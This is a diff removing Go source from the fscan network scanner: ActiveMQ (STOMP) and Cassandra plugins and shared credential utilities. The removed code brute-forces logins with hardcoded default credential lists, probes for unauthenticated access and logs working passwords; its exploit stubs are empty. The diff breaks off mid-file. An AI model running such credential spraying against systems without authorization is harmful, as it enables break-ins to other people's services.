-			cancel()
-
-			if result != nil && result.Success {
-				return result
-			}
-
-			// 检查是否需要重试
-			if err != nil && !shouldRetry(err) {
-				break
-			}
-		}
-	}
-
-	return &ScanResult{
-		Success: false,
-		Error:   fmt.Errorf("重试次数耗尽"),
-	}
-}
-
-// shouldRetry 判断是否应该重试
-func shouldRetry(err error) bool {
-	if err == nil {
-		return false
-	}
-
-	errStr := strings.ToLower(err.Error())
-	
-	// 不需要重试的错误
-	noRetryErrors := []string{
-		"access denied",
-		"authentication failed",
-		"invalid credentials",
-		"permission denied",
-		"unauthorized",
-	}
-
-	for _, noRetry := range noRetryErrors {
-		if strings.Contains(errStr, noRetry) {
-			return false
-		}
-	}
-
-	return true
-}
-
-// =============================================================================
-// 凭据生成工具
-// =============================================================================
-
-// GenerateCredentials 生成用户名密码组合的凭据列表
-func GenerateCredentials(usernames []string, passwords []string) []*Credential {
-	var credentials []*Credential
-	
-	for _, username := range usernames {
-		for _, password := range passwords {
-			// 支持 {user} 占位符替换
-			actualPassword := strings.ReplaceAll(password, "{user}", username)
-			
-			credentials = append(credentials, &Credential{
-				Username: username,
-				Password: actualPassword,
-				Extra:    make(map[string]string),
-			})
-		}
-	}
-	
-	return credentials
-}
-
-// GeneratePasswordOnlyCredentials 生成仅密码的凭据列表（如Redis）
-func GeneratePasswordOnlyCredentials(passwords []string) []*Credential {
-	var credentials []*Credential
-	
-	for _, password := range passwords {
-		credentials = append(credentials, &Credential{
-			Password: password,
-			Extra:    make(map[string]string),
-		})
-	}
-	
-	return credentials
-}
-
-// =============================================================================
-// 结果处理工具
-// =============================================================================
-
-// SaveScanResult 保存扫描结果到通用输出系统
-func SaveScanResult(info *common.HostInfo, result *ScanResult, pluginName string) {
-	if result == nil || !result.Success {
-		return
-	}
-
-	target := fmt.Sprintf("%s:%d", info.Host, info.Ports)
-	
-	// 保存成功的凭据
-	for _, cred := range result.Credentials {
-		var message string
-		if cred.Username != "" && cred.Password != "" {
-			message = fmt.Sprintf("%s %s %s %s", pluginName, target, cred.Username, cred.Password)
-		} else if cred.Password != "" {
-			message = fmt.Sprintf("%s %s [密码] %s", pluginName, target, cred.Password)
-		} else {
-			message = fmt.Sprintf("%s %s 未授权访问", pluginName, target)
-		}
-		
-		common.LogSuccess(message)
-		
-		// 保存到输出系统的详细实现...
-		// 这里可以调用common.SaveResult等函数
-	}
-}

Plugins/services/activemq/connector.go

@@ -1,201 +0,0 @@
-package activemq
-
-import (
-	"context"
-	"fmt"
-	"net"
-	"strconv"
-	"strings"
-	"time"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// ActiveMQConnector 实现ActiveMQ消息队列服务连接器
-// 基于STOMP协议提供标准化的ActiveMQ连接和认证功能
-// 遵循 base.ServiceConnector 接口规范，支持弱密码检测和自动利用
-type ActiveMQConnector struct {
-	host    string        // 目标主机地址
-	port    int           // 目标端口号
-	timeout time.Duration // 连接超时时间
-}
-
-// NewActiveMQConnector 创建新的ActiveMQ连接器实例
-func NewActiveMQConnector() *ActiveMQConnector {
-	return &ActiveMQConnector{
-		timeout: time.Duration(common.Timeout) * time.Second,
-	}
-}
-
-// Connect 建立到ActiveMQ服务的基础连接
-// 实现 base.ServiceConnector 接口的 Connect 方法
-// 返回原始TCP连接，供后续认证阶段使用
-func (c *ActiveMQConnector) Connect(ctx context.Context, info *common.HostInfo) (interface{}, error) {
-	// 解析目标端口号
-	port, err := strconv.Atoi(info.Ports)
-	if err != nil {
-		return nil, fmt.Errorf("无效的端口号: %s", info.Ports)
-	}
-	
-	// 缓存目标信息，供认证阶段使用
-	c.host = info.Host
-	c.port = port
-	
-	target := fmt.Sprintf("%s:%d", info.Host, port)
-	
-	// 创建带超时的TCP连接
-	conn, err := c.connectWithTimeout(ctx, target)
-	if err != nil {
-		return nil, fmt.Errorf("连接失败: %v", err)
-	}
-	
-	return conn, nil
-}
-
-// Authenticate 使用STOMP协议对ActiveMQ服务进行身份认证
-func (c *ActiveMQConnector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-	// 从连接接口中获取TCP连接
-	tcpConn, ok := conn.(net.Conn)
-	if !ok {
-		return fmt.Errorf("无效的连接类型")
-	}
-	
-	// 使用STOMP协议进行认证
-	err := c.authenticateSTOMP(ctx, tcpConn, cred.Username, cred.Password)
-	if err == nil {
-		common.LogDebug(i18n.GetText("activemq_stomp_auth_success", cred.Username, c.host, c.port))
-	} else {
-		common.LogDebug(i18n.GetText("activemq_stomp_auth_failed", err))
-	}
-	
-	return err
-}
-
-// Close 关闭ActiveMQ连接
-// 实现 base.ServiceConnector 接口的 Close 方法
-// 发送STOMP DISCONNECT帧进行优雅断开
-func (c *ActiveMQConnector) Close(conn interface{}) error {
-	if conn == nil {
-		return nil
-	}
-
-	tcpConn, ok := conn.(net.Conn)
-	if !ok {
-		return fmt.Errorf("无效的连接类型")
-	}
-
-	// 发送DISCONNECT帧
-	disconnectFrame := "DISCONNECT\n\n\x00"
-	tcpConn.Write([]byte(disconnectFrame))
-
-	// 关闭连接
-	return tcpConn.Close()
-}
-
-// connectWithTimeout 创建带超时的TCP连接
-func (c *ActiveMQConnector) connectWithTimeout(ctx context.Context, target string) (net.Conn, error) {
-	// 使用现有的TCP包装器以保持兼容性
-	return common.WrapperTcpWithTimeout("tcp", target, c.timeout)
-}
-
-// authenticateSTOMP 使用STOMP协议进行身份验证
-func (c *ActiveMQConnector) authenticateSTOMP(ctx context.Context, conn net.Conn, username, password string) error {
-	// 构造STOMP CONNECT命令
-	// STOMP是一种简单的文本协议，用于与消息代理通信
-	stompConnect := fmt.Sprintf("CONNECT\naccept-version:1.0,1.1,1.2\nhost:/\nlogin:%s\npasscode:%s\n\n\x00", 
-		username, password)
-
-	// 设置写超时并发送认证请求
-	if err := conn.SetWriteDeadline(time.Now().Add(c.timeout)); err != nil {
-		return fmt.Errorf("设置写超时失败: %v", err)
-	}
-	
-	if _, err := conn.Write([]byte(stompConnect)); err != nil {
-		return fmt.Errorf("发送认证请求失败: %v", err)
-	}
-
-	// 设置读超时并读取响应
-	if err := conn.SetReadDeadline(time.Now().Add(c.timeout)); err != nil {
-		return fmt.Errorf("设置读超时失败: %v", err)
-	}
-
-	// 读取服务器响应
-	response := make([]byte, 1024)
-	n, err := conn.Read(response)
-	if err != nil {
-		return fmt.Errorf("读取响应失败: %v", err)
-	}
-
-	// 解析STOMP响应
-	success, parseErr := c.parseSTOMPResponse(string(response[:n]))
-	if !success {
-		return parseErr
-	}
-	
-	return nil
-}
-
-// parseSTOMPResponse 解析STOMP协议响应
-func (c *ActiveMQConnector) parseSTOMPResponse(response string) (bool, error) {
-	// 检查成功的连接响应
-	if strings.Contains(response, "CONNECTED") {
-		return true, nil
-	}
-
-	// 检查认证失败响应
-	if strings.Contains(response, "ERROR") {
-		// 提取错误信息
-		lines := strings.Split(response, "\n")
-		for _, line := range lines {
-			if strings.HasPrefix(line, "message:") {
-				errorMsg := strings.TrimPrefix(line, "message:")
-				return false, fmt.Errorf("认证失败: %s", errorMsg)
-			}
-		}
-		return false, fmt.Errorf("认证失败: 服务器返回ERROR")
-	}
-
-	// 检查其他可能的认证失败指示
-	if strings.Contains(response, "Authentication failed") || 
-	   strings.Contains(response, "Access denied") ||
-	   strings.Contains(response, "Invalid credentials") {
-		return false, fmt.Errorf("认证失败: 无效凭据")
-	}
-
-	// 未知响应类型
-	return false, fmt.Errorf("未知响应格式: %s", response)
-}
-
-
-
-
-
-// getProtocolByPort 根据端口获取协议类型
-func (c *ActiveMQConnector) getProtocolByPort(port int) string {
-	switch port {
-	case 61613, 61614:
-		return "STOMP"
-	default:
-		return "STOMP" // 默认仅支持STOMP
-	}
-}
-
-// GetDefaultCredentials 获取ActiveMQ默认凭据
-func (c *ActiveMQConnector) GetDefaultCredentials() []*base.Credential {
-	return []*base.Credential{
-		{Username: "admin", Password: "admin"},
-		{Username: "admin", Password: "Aa123456789"}, // 测试环境凭据
-		{Username: "test", Password: "test123"},      // 测试环境凭据
-		{Username: "root", Password: "root123"},      // 测试环境凭据
-		{Username: "system", Password: "admin123"},   // 测试环境凭据
-		{Username: "admin", Password: "password"},
-		{Username: "admin", Password: "123456"},
-		{Username: "user", Password: "user"},
-		{Username: "guest", Password: "guest"},
-		{Username: "activemq", Password: "activemq"},
-		{Username: "mqadmin", Password: "mqadmin"},
-		{Username: "broker", Password: "broker"},
-	}
-}

Plugins/services/activemq/exploiter.go

@@ -1,37 +0,0 @@
-package activemq
-
-import (
-	"context"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// ActiveMQExploiter ActiveMQ利用器实现 - 最小化版本，不提供利用功能
-type ActiveMQExploiter struct {
-	*base.BaseExploiter
-}
-
-// NewActiveMQExploiter 创建ActiveMQ利用器
-func NewActiveMQExploiter() *ActiveMQExploiter {
-	exploiter := &ActiveMQExploiter{
-		BaseExploiter: base.NewBaseExploiter("activemq"),
-	}
-	
-	// ActiveMQ插件不提供利用功能
-	exploiter.setupExploitMethods()
-	
-	return exploiter
-}
-
-// setupExploitMethods 设置利用方法
-func (e *ActiveMQExploiter) setupExploitMethods() {
-	// ActiveMQ插件暂时不提供利用功能，因为当前实现的都是信息收集类功能
-	// 没有实际的GetShell或文件写入等攻击价值
-}
-
-// Exploit 利用接口实现 - 空实现
-func (e *ActiveMQExploiter) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	// ActiveMQ插件不提供利用功能
-	return nil, nil
-}

Plugins/services/activemq/plugin.go

@@ -1,344 +0,0 @@
-package activemq
-
-import (
-	"context"
-	"fmt"
-	"net"
-	"strings"
-	"time"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// ActiveMQ插件：基于新一代插件架构的完整实现
-// 支持STOMP协议的弱密码检测、信息收集、队列管理等功能
-// 展示了消息队列服务插件的标准实现模式
-
-// ActiveMQPlugin ActiveMQ消息队列扫描和利用插件
-// 集成了弱密码检测、自动利用、信息收集等完整功能
-type ActiveMQPlugin struct {
-	*base.ServicePlugin                // 继承基础服务插件功能
-	exploiter           *ActiveMQExploiter // ActiveMQ专用利用模块
-}
-
-// NewActiveMQPlugin 创建新的ActiveMQ插件实例
-// 这是标准的插件工厂函数，展示了新架构的完整初始化流程
-func NewActiveMQPlugin() *ActiveMQPlugin {
-	// 定义插件元数据 - 这些信息用于插件注册和管理
-	metadata := &base.PluginMetadata{
-		Name:        "activemq",                           // 插件唯一标识符
-		Version:     "2.0.0",                             // 插件版本（新架构版本）
-		Author:      "fscan-team",                        // 开发团队
-		Description: "ActiveMQ消息队列扫描和利用插件",      // 功能描述
-		Category:    "service",                           // 插件类别
-		Ports:       []int{61613, 61614}, // ActiveMQ STOMP端口：标准端口, SSL端口
-		Protocols:   []string{"tcp", "stomp"},            // 支持的协议
-		Tags:        []string{"message-queue", "activemq", "stomp", "bruteforce", "exploit"}, // 功能标签
-	}
-	
-	// 创建ActiveMQ专用连接器
-	connector := NewActiveMQConnector()
-	
-	// 基于连接器创建基础服务插件
-	servicePlugin := base.NewServicePlugin(metadata, connector)
-	
-	// 组装完整的ActiveMQ插件
-	plugin := &ActiveMQPlugin{
-		ServicePlugin: servicePlugin,
-		exploiter:     NewActiveMQExploiter(), // 集成利用模块
-	}
-	
-	// 声明插件具备的安全测试能力
-	plugin.SetCapabilities([]base.Capability{
-		base.CapWeakPassword,     // 弱密码检测
-		base.CapDataExtraction,  // 数据提取
-		base.CapInformationLeak, // 信息泄露
-		base.CapPrivilegeEsc,    // 权限提升
-	})
-	
-	return plugin
-}
-
-// Scan 执行ActiveMQ服务的完整安全扫描
-// 重写基础扫描方法，集成弱密码检测和自动利用功能
-func (p *ActiveMQPlugin) Scan(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 如果禁用暴力破解，则进行基础服务识别
-	if common.DisableBrute {
-		return p.performServiceIdentification(ctx, info)
-	}
-	
-	// 调用基础服务插件进行弱密码扫描
-	result, err := p.ServicePlugin.Scan(ctx, info)
-	if err != nil || !result.Success {
-		return result, err // 扫描失败，直接返回
-	}
-	
-	// 记录成功的弱密码发现（使用i18n，根据端口显示不同协议）
-	cred := result.Credentials[0]
-	
-	// 专注于STOMP协议的成功消息
-	common.LogSuccess(i18n.GetText("activemq_stomp_scan_success", target, cred.Username, cred.Password))
-	
-	// 自动利用功能（可通过-ne参数禁用）
-	if result.Success && len(result.Credentials) > 0 && !common.DisableExploit {
-		// 同步执行利用攻击，确保显示结果
-		p.autoExploit(context.Background(), info, result.Credentials[0])
-	}
-	
-	return result, nil
-}
-
-// autoExploit 自动利用
-func (p *ActiveMQPlugin) autoExploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	common.LogDebug(i18n.GetText("plugin_exploit_start", "ActiveMQ", target))
-	
-	// 执行利用
-	result, err := p.exploiter.Exploit(ctx, info, creds)
-	if err != nil {
-		common.LogDebug(i18n.GetText("plugin_exploit_failed", "ActiveMQ", err))
-		return
-	}
-	
-	if result != nil && result.Success {
-		// 使用利用结果中的Method字段作为方法名称
-		methodName := result.Method
-		if methodName == "" {
-			methodName = p.getExploitMethodName(result.Type)
-		}
-		
-		// 只显示一次完整的利用结果
-		if result.Output != "" {
-			common.LogSuccess(fmt.Sprintf("ActiveMQ %s %s 利用成功 输出: %s", target, methodName, result.Output))
-		} else {
-			common.LogSuccess(fmt.Sprintf("ActiveMQ %s %s 利用成功", target, methodName))
-		}
-		
-		// 保存利用结果（不显示额外日志）
-		// base.SaveExploitResult(info, result, "ActiveMQ")
-	}
-}
-
-// getExploitMethodName 获取利用方法的中文名称
-func (p *ActiveMQPlugin) getExploitMethodName(method base.ExploitType) string {
-	switch method {
-	case base.ExploitDataExtraction:
-		return i18n.GetText("exploit_method_name_data_extraction")
-	case base.ExploitPrivilegeEsc:
-		return i18n.GetText("exploit_method_name_activemq_queue_mgmt")
-	default:
-		return "未知利用"
-	}
-}
-
-// Exploit 手动利用接口
-func (p *ActiveMQPlugin) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	return p.exploiter.Exploit(ctx, info, creds)
-}
-
-// GetExploitMethods 获取利用方法
-func (p *ActiveMQPlugin) GetExploitMethods() []base.ExploitMethod {
-	return p.exploiter.GetExploitMethods()
-}
-
-// IsExploitSupported 检查利用支持
-func (p *ActiveMQPlugin) IsExploitSupported(method base.ExploitType) bool {
-	return p.exploiter.IsExploitSupported(method)
-}
-
-// generateCredentials 重写凭据生成方法
-func (p *ActiveMQPlugin) generateCredentials() []*base.Credential {
-	// 获取ActiveMQ专用的用户名字典
-	usernames := common.Userdict["activemq"]
-	if len(usernames) == 0 {
-		// 默认ActiveMQ用户名
-		usernames = []string{
-			"admin", "test", "root", "system", "user", "guest",
-			"manager", "activemq", "mqadmin", "broker",
-		}
-	}
-	
-	// 生成基本凭据组合
-	credentials := base.GenerateCredentials(usernames, common.Passwords)
-	
-	// 添加ActiveMQ专用的默认凭据
-	defaultCreds := p.ServicePlugin.GetServiceConnector().(*ActiveMQConnector).GetDefaultCredentials()
-	credentials = append(credentials, defaultCreds...)
-	
-	// 去重处理（简化实现）
-	seen := make(map[string]bool)
-	var unique []*base.Credential
-	for _, cred := range credentials {
-		key := cred.Username + ":" + cred.Password
-		if !seen[key] {
-			seen[key] = true
-			unique = append(unique, cred)
-		}
-	}
-	return unique
-}
-
-// performServiceIdentification 执行服务识别（-nobr模式）
-func (p *ActiveMQPlugin) performServiceIdentification(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 尝试连接到ActiveMQ服务进行基础识别
-	conn, err := common.WrapperTcpWithTimeout("tcp", target, time.Duration(common.Timeout)*time.Second)
-	if err != nil {
-		return &base.ScanResult{
-			Success: false,
-			Error:   err,
-		}, nil
-	}
-	defer conn.Close()
-	
-	// 尝试STOMP协议识别
-	stompInfo, isActiveMQ := p.identifySTOMPService(conn)
-	if isActiveMQ {
-		// 记录服务识别成功
-		common.LogSuccess(i18n.GetText("activemq_service_identified", target, "STOMP", stompInfo))
-		
-		return &base.ScanResult{
-			Success: true,
-			Service: "ActiveMQ",
-			Banner:  stompInfo,
-			Extra: map[string]interface{}{
-				"service":   "ActiveMQ",
-				"protocol":  "STOMP",
-				"port":      info.Ports,
-				"info":      stompInfo,
-			},
-		}, nil
-	}
-	
-	// 如果无法识别为ActiveMQ，返回一般服务信息
-	return &base.ScanResult{
-		Success: false,
-		Error:   fmt.Errorf("无法识别为ActiveMQ服务"),
-	}, nil
-}
-
-// identifySTOMPService 识别STOMP协议服务
-func (p *ActiveMQPlugin) identifySTOMPService(conn net.Conn) (string, bool) {
-	// 发送STOMP CONNECT帧进行协议识别（不提供凭据）
-	connectFrame := "CONNECT\naccept-version:1.0,1.1,1.2\nhost:localhost\n\n\x00"
-	
-	conn.SetWriteDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
-	if _, err := conn.Write([]byte(connectFrame)); err != nil {
-		return "", false
-	}
-	
-	// 读取响应
-	conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
-	response := make([]byte, 1024)
-	n, err := conn.Read(response)
-	if err != nil {
-		return "", false
-	}
-	
-	responseStr := string(response[:n])
-	
-	// 检查是否为STOMP协议响应
-	if strings.Contains(responseStr, "CONNECTED") {
-		// 提取版本信息
-		version := "unknown"
-		if strings.Contains(responseStr, "version:") {
-			lines := strings.Split(responseStr, "\n")
-			for _, line := range lines {
-				if strings.HasPrefix(line, "version:") {
-					version = strings.TrimPrefix(line, "version:")
-					break
-				}
-			}
-		}
-		
-		return fmt.Sprintf("STOMP协议版本: %s", version), true
-	} else if strings.Contains(responseStr, "ERROR") {
-		// 即使返回错误，但能识别STOMP协议格式
-		return "STOMP协议（需要认证）", true
-	}
-	
-	return "", false
-}
-
-// GetServiceName 获取服务名称
-func (p *ActiveMQPlugin) GetServiceName() string {
-	return "ActiveMQ"
-}
-
-// GetServiceDescription 获取服务描述
-func (p *ActiveMQPlugin) GetServiceDescription() string {
-	return "Apache ActiveMQ消息队列中间件"
-}
-
-// GetDefaultPorts 获取默认端口
-func (p *ActiveMQPlugin) GetDefaultPorts() []int {
-	return []int{61613, 61614}
-}
-
-// SupportsBruteforce 支持暴力破解
-func (p *ActiveMQPlugin) SupportsBruteforce() bool {
-	return true
-}
-
-// SupportsExploit 支持利用
-func (p *ActiveMQPlugin) SupportsExploit() bool {
-	return true
-}
-
-// GetProtocols 获取支持的协议
-func (p *ActiveMQPlugin) GetProtocols() []string {
-	return []string{"tcp", "stomp"}
-}
-
-// ValidateTarget 验证目标是否适用
-func (p *ActiveMQPlugin) ValidateTarget(info *common.HostInfo) error {
-	// 基本验证
-	if info.Host == "" {
-		return fmt.Errorf("主机地址不能为空")
-	}
-	
-	if info.Ports == "" {
-		return fmt.Errorf("端口不能为空")
-	}
-	
-	return nil
-}
-
-// =============================================================================
-// 插件注册
-// =============================================================================
-
-// RegisterActiveMQPlugin 注册ActiveMQ插件
-func RegisterActiveMQPlugin() {
-	factory := base.NewSimplePluginFactory(
-		&base.PluginMetadata{
-			Name:        "activemq",
-			Version:     "2.0.0",
-			Author:      "fscan-team", 
-			Description: "ActiveMQ消息队列扫描和利用插件",
-			Category:    "service",
-			Ports:       []int{61613, 61614},
-			Protocols:   []string{"tcp", "stomp"},
-			Tags:        []string{"message-queue", "activemq", "stomp", "bruteforce", "exploit"},
-		},
-		func() base.Plugin {
-			return NewActiveMQPlugin()
-		},
-	)
-	
-	// 注册到全局插件注册表
-	base.GlobalPluginRegistry.Register("activemq", factory)
-	
-	// 记录注册信息
-	common.LogDebug("ActiveMQ插件已注册")
-}
-
-// 自动注册
-func init() {
-	RegisterActiveMQPlugin()
-}

Plugins/services/cassandra/connector.go

@@ -1,169 +0,0 @@
-package cassandra
-
-import (
-	"context"
-	"fmt"
-	"net"
-	"strconv"
-	"time"
-
-	"github.com/gocql/gocql"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// CassandraConnector Cassandra连接器实现
-type CassandraConnector struct {
-	host string
-	port string
-}
-
-// CassandraProxyDialer 实现gocql.Dialer接口，支持代理连接
-type CassandraProxyDialer struct {
-	timeout time.Duration
-}
-
-// DialContext 实现代理拨号
-func (d *CassandraProxyDialer) DialContext(ctx context.Context, network, addr string) (net.Conn, error) {
-	host, port, err := net.SplitHostPort(addr)
-	if err != nil {
-		return nil, err
-	}
-	return common.WrapperTcpWithContext(ctx, network, fmt.Sprintf("%s:%s", host, port))
-}
-
-// NewCassandraConnector 创建Cassandra连接器
-func NewCassandraConnector() *CassandraConnector {
-	return &CassandraConnector{}
-}
-
-// Connect 连接到Cassandra服务
-func (c *CassandraConnector) Connect(ctx context.Context, info *common.HostInfo) (interface{}, error) {
-	c.host = info.Host
-	c.port = info.Ports
-	
-	// 创建Cassandra集群配置
-	cluster := gocql.NewCluster(c.host)
-	
-	// 解析端口
-	port, err := strconv.Atoi(c.port)
-	if err != nil {
-		return nil, fmt.Errorf("无效的端口号: %s", c.port)
-	}
-	cluster.Port = port
-	
-	// 设置连接参数
-	timeout := time.Duration(common.Timeout) * time.Second
-	cluster.Timeout = timeout
-	cluster.ConnectTimeout = timeout
-	cluster.ProtoVersion = 4
-	cluster.Consistency = gocql.One
-	
-	// 如果配置了代理，设置自定义Dialer
-	if common.Socks5Proxy != "" {
-		cluster.Dialer = &CassandraProxyDialer{
-			timeout: timeout,
-		}
-	}
-	
-	// 设置重试策略
-	cluster.RetryPolicy = &gocql.SimpleRetryPolicy{NumRetries: 3}
-	
-	return cluster, nil
-}
-
-// Authenticate 认证
-func (c *CassandraConnector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-	cluster, ok := conn.(*gocql.ClusterConfig)
-	if !ok {
-		return fmt.Errorf("无效的连接类型")
-	}
-	
-	// 创建集群配置副本
-	authCluster := *cluster
-	
-	// 设置认证信息
-	if cred.Username != "" || cred.Password != "" {
-		authCluster.Authenticator = gocql.PasswordAuthenticator{
-			Username: cred.Username,
-			Password: cred.Password,
-		}
-	}
-	
-	// 创建会话通道以支持Context超时
-	sessionChan := make(chan struct {
-		session *gocql.Session
-		err     error
-	}, 1)
-	
-	// 在goroutine中创建会话，以便可以通过Context取消
-	go func() {
-		session, err := authCluster.CreateSession()
-		select {
-		case <-ctx.Done():
-			if session != nil {
-				session.Close()
-			}
-		case sessionChan <- struct {
-			session *gocql.Session
-			err     error
-		}{session, err}:
-		}
-	}()
-	
-	// 等待会话创建或Context取消
-	var session *gocql.Session
-	var err error
-	select {
-	case result := <-sessionChan:
-		session, err = result.session, result.err
-		if err != nil {
-			return fmt.Errorf("Cassandra认证失败: %v", err)
-		}
-	case <-ctx.Done():
-		return fmt.Errorf("Cassandra连接超时: %v", ctx.Err())
-	}
-	
-	defer session.Close()
-	
-	// 尝试执行查询验证连接
-	resultChan := make(chan struct {
-		success bool
-		err     error
-	}, 1)
-	
-	go func() {
-		var err error
-		
-		// 尝试两种查询，确保至少一种成功
-		err = session.Query("SELECT peer FROM system.peers").WithContext(ctx).Scan(nil)
-		if err != nil {
-			err = session.Query("SELECT now() FROM system.local").WithContext(ctx).Scan(nil)
-		}
-		
-		select {
-		case <-ctx.Done():
-		case resultChan <- struct {
-			success bool
-			err     error
-		}{err == nil, err}:
-		}
-	}()
-	
-	// 等待查询结果或Context取消
-	select {
-	case result := <-resultChan:
-		if !result.success && result.err != nil {
-			return fmt.Errorf("Cassandra查询验证失败: %v", result.err)
-		}
-		return nil
-	case <-ctx.Done():
-		return fmt.Errorf("Cassandra查询超时: %v", ctx.Err())
-	}
-}
-
-// Close 关闭连接
-func (c *CassandraConnector) Close(conn interface{}) error {
-	// Cassandra集群配置无需显式关闭
-	return nil
-}

Plugins/services/cassandra/exploiter.go

@@ -1,37 +0,0 @@
-package cassandra
-
-import (
-	"context"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// CassandraExploiter Cassandra利用器实现 - 最小化版本，不提供利用功能
-type CassandraExploiter struct {
-	*base.BaseExploiter
-}
-
-// NewCassandraExploiter 创建Cassandra利用器
-func NewCassandraExploiter() *CassandraExploiter {
-	exploiter := &CassandraExploiter{
-		BaseExploiter: base.NewBaseExploiter("cassandra"),
-	}
-	
-	// Cassandra插件不提供利用功能
-	exploiter.setupExploitMethods()
-	
-	return exploiter
-}
-
-// setupExploitMethods 设置利用方法
-func (e *CassandraExploiter) setupExploitMethods() {
-	// Cassandra插件不提供利用功能，仅进行弱密码扫描
-}
-
-// Exploit 利用接口实现 - 空实现
-func (e *CassandraExploiter) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	// Cassandra插件不提供利用功能
-	return nil, nil
-}
-

Plugins/services/cassandra/plugin.go

@@ -1,281 +0,0 @@
-package cassandra
-
-import (
-	"context"
-	"fmt"
-	"net"
-	"strings"
-	"time"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// CassandraPlugin Cassandra插件实现
-type CassandraPlugin struct {
-	*base.ServicePlugin
-	exploiter *CassandraExploiter
-}
-
-// NewCassandraPlugin 创建Cassandra插件
-func NewCassandraPlugin() *CassandraPlugin {
-	// 插件元数据
-	metadata := &base.PluginMetadata{
-		Name:        "cassandra",
-		Version:     "2.0.0",
-		Author:      "fscan-team",
-		Description: "Apache Cassandra服务扫描和利用插件",
-		Category:    "service",
-		Ports:       []int{9042}, // Cassandra Native Protocol
-		Protocols:   []string{"tcp"},
-		Tags:        []string{"cassandra", "nosql", "database", "bruteforce"},
-	}
-	
-	// 创建连接器和服务插件
-	connector := NewCassandraConnector()
-	servicePlugin := base.NewServicePlugin(metadata, connector)
-	
-	// 创建Cassandra插件
-	plugin := &CassandraPlugin{
-		ServicePlugin: servicePlugin,
-		exploiter:     NewCassandraExploiter(),
-	}
-	
-	// 设置能力
-	plugin.SetCapabilities([]base.Capability{
-		base.CapWeakPassword,
-		base.CapDataExtraction,
-		base.CapInformationLeak,
-	})
-	
-	return plugin
-}
-
-// Scan 重写扫描方法以支持自动利用
-func (p *CassandraPlugin) Scan(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	// 如果禁用暴力破解，只进行服务识别
-	if common.DisableBrute {
-		return p.performServiceIdentification(ctx, info)
-	}
-	
-	// 执行基础的密码扫描
-	result, err := p.ServicePlugin.Scan(ctx, info)
-	if err != nil || !result.Success {
-		return result, err
-	}
-	
-	// 记录成功的弱密码/未授权访问发现
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	cred := result.Credentials[0]
-	
-	if cred.Username == "" && cred.Password == "" {
-		// 未授权访问
-		common.LogSuccess(i18n.GetText("plugin_unauthorized_access", "Cassandra", target))
-	} else {
-		// 弱密码
-		common.LogSuccess(i18n.GetText("plugin_login_success", "Cassandra", target, cred.Username, cred.Password))
-	}
-	
-	// 自动利用功能（可通过-ne参数禁用）
-	if result.Success && len(result.Credentials) > 0 && !common.DisableExploit {
-		p.autoExploit(context.Background(), info, result.Credentials[0])
-	}
-	
-	return result, nil
-}
-
-// generateCredentials 生成Cassandra凭据
-func (p *CassandraPlugin) generateCredentials() []*base.Credential {
-	// 获取Cassandra专用的用户名字典
-	usernames := common.Userdict["cassandra"]
-	if len(usernames) == 0 {
-		// 默认Cassandra用户名（包含空用户名用于测试未授权访问）
-		usernames = []string{"", "cassandra", "admin", "root", "user"}
-	}
-	
-	// 生成凭据组合，包括空密码测试未授权访问
-	var credentials []*base.Credential
-	
-	// 首先测试未授权访问（空用户名和密码）
-	credentials = append(credentials, &base.Credential{
-		Username: "",
-		Password: "",
-	})
-	
-	// 然后生成常规用户名密码组合
-	regularCreds := base.GenerateCredentials(usernames, common.Passwords)
-	credentials = append(credentials, regularCreds...)
-	
-	return credentials
-}
-
-// autoExploit 自动利用功能
-func (p *CassandraPlugin) autoExploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	common.LogDebug(i18n.GetText("plugin_exploit_start", "Cassandra", target))
-	
-	// 执行利用操作
-	result, err := p.exploiter.Exploit(ctx, info, creds)
-	if err != nil {
-		common.LogError(i18n.GetText("plugin_exploit_failed", "Cassandra", err))
-		return
-	}
-	
-	// 处理利用结果
-	if result != nil && result.Success {
-		// SaveExploitResult会自动使用LogSuccess显示红色利用成功消息
-		base.SaveExploitResult(info, result, "Cassandra")
-	}
-}
-
-// Exploit 使用exploiter执行利用
-func (p *CassandraPlugin) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	return p.exploiter.Exploit(ctx, info, creds)
-}
-
-// GetExploitMethods 获取利用方法
-func (p *CassandraPlugin) GetExploitMethods() []base.ExploitMethod {
-	return p.exploiter.GetExploitMethods()
-}
-
-// IsExploitSupported 检查利用支持
-func (p *CassandraPlugin) IsExploitSupported(method base.ExploitType) bool {
-	return p.exploiter.IsExploitSupported(method)
-}
-
-// performServiceIdentification 执行Cassandra服务识别（-nobr模式）
